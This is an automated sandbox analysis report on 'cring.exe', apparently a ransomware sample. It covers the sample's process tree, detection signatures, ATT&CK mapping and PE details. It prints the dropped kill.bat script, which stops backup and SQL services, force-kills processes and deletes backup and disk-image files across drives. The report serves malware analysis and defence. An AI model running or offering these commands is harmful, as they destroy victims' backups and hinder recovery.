Loading ...

Play interactive tourEdit tour

Analysis Report cring.exe

Overview

General Information

Sample Name:cring.exe
Analysis ID:333004
MD5:c5d712f82d5d37bb284acd4468ab3533
SHA1:3426e8dcb104d9b01874498fb44c6e460228a9a0
SHA256:f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8

Most interesting Screenshot:

Detection

Score:25
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses net.exe to stop services
Uses taskkill to terminate processes

Classification

Startup

  • System is w10x64
  • cring.exe (PID: 4532 cmdline: 'C:\Users\user\Desktop\cring.exe' MD5: C5D712F82D5D37BB284ACD4468AB3533)
    • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 6104 cmdline: net stop BMR Boot Service /y MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 5556 cmdline: C:\Windows\system32\net1 stop BMR Boot Service /y MD5: AF569DE92AB6C1B9C681AF1E799F9983)
      • net.exe (PID: 2924 cmdline: net stop NetBackup BMR MTFTP Service /y MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 6960 cmdline: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y MD5: AF569DE92AB6C1B9C681AF1E799F9983)
      • sc.exe (PID: 4388 cmdline: sc config SQLTELEMETRY start= disabled MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 4112 cmdline: sc config SQLTELEMETRY$ECWDB2 start= disabled MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 4104 cmdline: sc config SQLWriter start= disabled MD5: D79784553A9410D15E04766AAAB77CD6)
      • sc.exe (PID: 6704 cmdline: sc config SstpSvc start= disabled MD5: D79784553A9410D15E04766AAAB77CD6)
      • taskkill.exe (PID: 6760 cmdline: taskkill /IM mspub.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 6876 cmdline: taskkill /IM mydesktopqos.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
      • taskkill.exe (PID: 6932 cmdline: taskkill /IM mydesktopservice.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Net.exe ExecutionShow sources
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net stop BMR Boot Service /y, CommandLine: net stop BMR Boot Service /y, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe'', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6048, ProcessCommandLine: net stop BMR Boot Service /y, ProcessId: 6104

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: cring.exeBinary or memory string: OriginalFilename vs cring.exe
Source: cring.exe, 00000000.00000002.324569603.0000000000F9C000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs cring.exe
Source: cring.exe, 00000000.00000002.324729946.0000000001340000.00000002.00000001.sdmpBinary or memory string: originalfilename vs cring.exe
Source: cring.exe, 00000000.00000002.324729946.0000000001340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs cring.exe
Source: cring.exe, 00000000.00000002.324691361.00000000012E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs cring.exe
Source: classification engineClassification label: sus25.winEXE@28/3@0/0
Source: C:\Users\user\Desktop\cring.exeFile created: C:\Users\user\Desktop\kill.batJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe''
Source: cring.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cring.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mspub.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mydesktopqos.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mydesktopservice.exe")
Source: C:\Users\user\Desktop\cring.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\cring.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\cring.exe 'C:\Users\user\Desktop\cring.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe''
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\net.exe net stop BMR Boot Service /y
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y
Source: unknownProcess created: C:\Windows\System32\net.exe net stop NetBackup BMR MTFTP Service /y
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
Source: unknownProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY start= disabled
Source: unknownProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY$ECWDB2 start= disabled
Source: unknownProcess created: C:\Windows\System32\sc.exe sc config SQLWriter start= disabled
Source: unknownProcess created: C:\Windows\System32\sc.exe sc config SstpSvc start= disabled
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mspub.exe /F
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopqos.exe /F
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopservice.exe /F
Source: C:\Users\user\Desktop\cring.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe''Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop BMR Boot Service /yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop NetBackup BMR MTFTP Service /yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY$ECWDB2 start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLWriter start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SstpSvc start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mspub.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopqos.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopservice.exe /FJump to behavior
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop BMR Boot Service /yJump to behavior
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /yJump to behavior
Source: C:\Users\user\Desktop\cring.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: cring.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: cring.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: cring.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\FuckCrowStrike\Desktop\NewCring\Crypt3r\obj\Release\cring.pdb source: cring.exe

Data Obfuscation:

barindex
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xA069F415 [Wed Apr 14 06:52:05 2055 UTC]
Source: unknownProcess created: C:\Windows\System32\net.exe net stop BMR Boot Service /y
Source: unknownProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY start= disabled
Source: C:\Users\user\Desktop\cring.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cring.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\cring.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\cring.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: sc.exe, 00000008.00000002.330354414.0000025ACD650000.00000002.00000001.sdmp, sc.exe, 00000009.00000002.331433462.0000026F021C0000.00000002.00000001.sdmp, sc.exe, 0000000A.00000002.332589167.0000020625470000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sc.exe, 00000008.00000002.330354414.0000025ACD650000.00000002.00000001.sdmp, sc.exe, 00000009.00000002.331433462.0000026F021C0000.00000002.00000001.sdmp, sc.exe, 0000000A.00000002.332589167.0000020625470000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: sc.exe, 00000008.00000002.330354414.0000025ACD650000.00000002.00000001.sdmp, sc.exe, 00000009.00000002.331433462.0000026F021C0000.00000002.00000001.sdmp, sc.exe, 0000000A.00000002.332589167.0000020625470000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: sc.exe, 00000008.00000002.330354414.0000025ACD650000.00000002.00000001.sdmp, sc.exe, 00000009.00000002.331433462.0000026F021C0000.00000002.00000001.sdmp, sc.exe, 0000000A.00000002.332589167.0000020625470000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\cring.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\cring.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\kill.bat' 'C:\Users\user\Desktop\cring.exe''Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop BMR Boot Service /yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop NetBackup BMR MTFTP Service /yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLTELEMETRY$ECWDB2 start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SQLWriter start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config SstpSvc start= disabledJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mspub.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopqos.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopservice.exe /FJump to behavior
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop BMR Boot Service /yJump to behavior
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mspub.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopqos.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mydesktopservice.exe /FJump to behavior
Source: C:\Users\user\Desktop\cring.exeQueries volume information: C:\Users\user\Desktop\cring.exe VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Windows Service11Windows Service11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection11Virtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution11Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 333004 Sample: cring.exe Startdate: 22/12/2020 Architecture: WINDOWS Score: 25 26 Binary contains a suspicious time stamp 2->26 8 cring.exe 4 2->8         started        process3 process4 10 cmd.exe 1 8->10         started        12 conhost.exe 8->12         started        process5 14 net.exe 1 10->14         started        16 net.exe 1 10->16         started        18 taskkill.exe 1 10->18         started        20 7 other processes 10->20 process6 22 net1.exe 1 14->22         started        24 net1.exe 1 16->24         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:333004
Start date:22.12.2020
Start time:04:53:27
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 55s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:cring.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:SUS
Classification:sus25.winEXE@28/3@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe
  • Execution Graph export aborted for target cring.exe, PID 4532 because it is empty
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cring.exe.log
Process:C:\Users\user\Desktop\cring.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):226
Entropy (8bit):5.354940450065058
Encrypted:false
SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:B10E37251C5B495643F331DB2EEC3394
SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
C:\Users\user\Desktop\kill.bat
Process:C:\Users\user\Desktop\cring.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1407
Entropy (8bit):3.9310668675465905
Encrypted:false
SSDEEP:24:HCRrUAHTdTWp3dTnp3d9up3dtpwOUu5u37MNwu8RtfmVv+9gCW15z+:HErUaRsVpz0hwOUu5u3vu83fAlr1Q
MD5:FE0CCC3A60E1A5B27C055EC36E62E9E0
SHA1:FE0251B0CAC8D8DA0C75B093BEFB313D304A5B95
SHA-256:AF01C5FC9899EADB46A643C2BDB78CD848B493B802922747477959769B91EE80
SHA-512:65668D5D6340C2477683726A81C416DA36F049A5127346CE8CD2479A59EC39D8EA8245C8D2FE17C66AADA8AE639177C83F091385082ACFCA1519B5AF30968621
Malicious:false
Preview: @echo off.. .. .. net stop BMR Boot Service /y.. net stop NetBackup BMR MTFTP Service /y.. sc config SQLTELEMETRY start= disabled.. sc config SQLTELEMETRY$ECWDB2 start= disabled.. sc config SQLWriter start= disabled.. sc config SstpSvc start= disabled.. taskkill /IM mspub.exe /F.. taskkill /IM mydesktopqos.exe /F.. taskkill /IM mydesktopservice.exe /F.. .. del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk.. del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk.. del /s /f /q f:\*.VHD f
\Device\ConDrv
Process:C:\Users\user\Desktop\cring.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):14
Entropy (8bit):3.521640636343319
Encrypted:false
SSDEEP:3:Bj7My:B0y
MD5:0D291FB1774588659C8389B058754887
SHA1:33D0C2CECAE7E2659D0426BDB35BF927A6AB9C9D
SHA-256:CE2FD7FA913EC9C5083157E545BA4B0B94F9C417D9E9C774CB639F15B32FB7B8
SHA-512:4C1C0A91930C215C8F729BE25BBA5D39A4B52BD0CD569518CA83BA97F8BA579C336CA474C62D57247D0C6F309E0B3E2F9A644F21B67623920F7972F1D48EC97F
Malicious:false
Preview: donot cry :)..

Static File Info

General

File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):4.816661034131266
TrID:
  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
  • Win32 Executable (generic) a (10002005/4) 49.78%
  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
  • Generic Win/DOS Executable (2004/3) 0.01%
  • DOS Executable Generic (2002/1) 0.01%
File name:cring.exe
File size:17408
MD5:c5d712f82d5d37bb284acd4468ab3533
SHA1:3426e8dcb104d9b01874498fb44c6e460228a9a0
SHA256:f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8
SHA512:be69319e023ccd23557edc3178a3b6775a771927a0e6d34f409b8d26cbe09fb27ff4bf92abdb0c344100404029b4e3f38963a0c27bd7a4ae35e5de2e779c6649
SSDEEP:384:asgE0J/RBKbpdqPnrjBCokjvPGumOiZ81eAl6CjUj:asgEMJwbK/X8AAl6Lj
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....i..........."...0..:...........Y... ...`....@.. ....................................@................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x4059c2
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0xA069F415 [Wed Apr 14 06:52:05 2055 UTC]
TLS Callbacks:
CLR (.Net) Version:v4.0.30319
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x596f0x4f.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x594.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x58d80x38.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x20000x39c80x3a00False0.450969827586data5.02617878935IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc0x60000x5940x600False0.409505208333data4.01898559948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
